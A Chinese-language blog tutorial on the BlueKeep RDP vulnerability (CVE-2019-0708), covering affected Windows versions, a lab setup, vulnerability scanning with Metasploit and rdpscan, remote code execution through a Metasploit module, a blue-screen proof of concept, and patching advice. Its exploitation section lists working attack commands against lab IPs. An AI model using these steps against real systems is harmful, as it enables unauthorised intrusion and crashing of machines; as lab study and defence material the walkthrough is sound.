CVE-2019-0708 windwos 远程桌面协议(RDP) 漏洞利用及加固


漏洞描述

  当未经身份验证的攻击者使用RDP连接到目标系统并发送经特殊设计的请求(也称为“远程桌面服务远程执行代码漏洞”)时,远程桌面服务中存在一个远程执行代码漏洞(以前称为终端服务)。

影响版本

  • Windows XP SP3 x86
  • Windows XP专业x64版SP2
  • Windows XP Embedded SP3 x86
  • Windows Server 2003 SP2 x86
  • Windows Server 2003 x64版本SP2
  • Windows Server 2003 R2 SP2
  • Windows Server 2003 R2 x64版SP2
  • Windows Vista SP2
  • Windows Vista x64版本SP2
  • Windows 7

漏洞环境搭建

迅雷下载:

ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

创建虚拟机时记得选择专业版安装,默认家庭版(家庭版无远程连接)
在这里插入图片描述
开启远程连接

在这里插入图片描述

漏洞检测

kali工具


启动msf

msfconsole

搜索漏洞检测exp

search 2019_0708

在这里插入图片描述

加载模块,设置需要检测的ip

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhosts 192.168.234.129
run

提示The target is vulnerable表示漏洞存在
在这里插入图片描述
多ip检测只需要设置ip格式成以下规则

set rhosts 192.168.234.128-133

在这里插入图片描述

windows 下检测工具

工具下载地址:https://github.com/k8gege/CVE-2019-0708

工具使用方法:

#批量扫描
rdpscan.exe 192.168.234.1-192.168.234.254
#单个扫描
rdpscan.exe 192.168.234.129

如果出现VULNERABLE - CVE-2019-0708说明存在漏洞
在这里插入图片描述

漏洞利用

漏洞限制较大,目前找到的rec脚本只针对 windows 7 系统

远程代码执行

攻击机:kali
目标机:windows 7

#启动msf
msfconsole

# 搜索2019-0708漏洞模块
search 2019-0708
#选择利用模块
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
#设置ip并进行工具
set rhosts 192.168.234.132
#修改目标系统类型(视情况而定)
set target 1
#执行攻击
run

在这里插入图片描述

如果set target 1不行,我们需要尝试其他系统的exp脚本,show targets可以查看针对与相对应系统的exp脚本

在这里插入图片描述

蓝屏

利用工具:
https://github.com/CVE-2019-0708/CVE-2019-0708

使用方法:

#python PoC.py ip
python PoC.py 192.168.234.129

可利用 WinXP | XP Embedded | Win7 | Server 2003 | Server 2008系统蓝屏
在这里插入图片描述

漏洞加固

  1. 安装一款360、火绒等类安全软件。
  2. 安装微软官方补丁 :https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708

猜你喜欢

转载自blog.csdn.net/weixin_41924764/article/details/109522132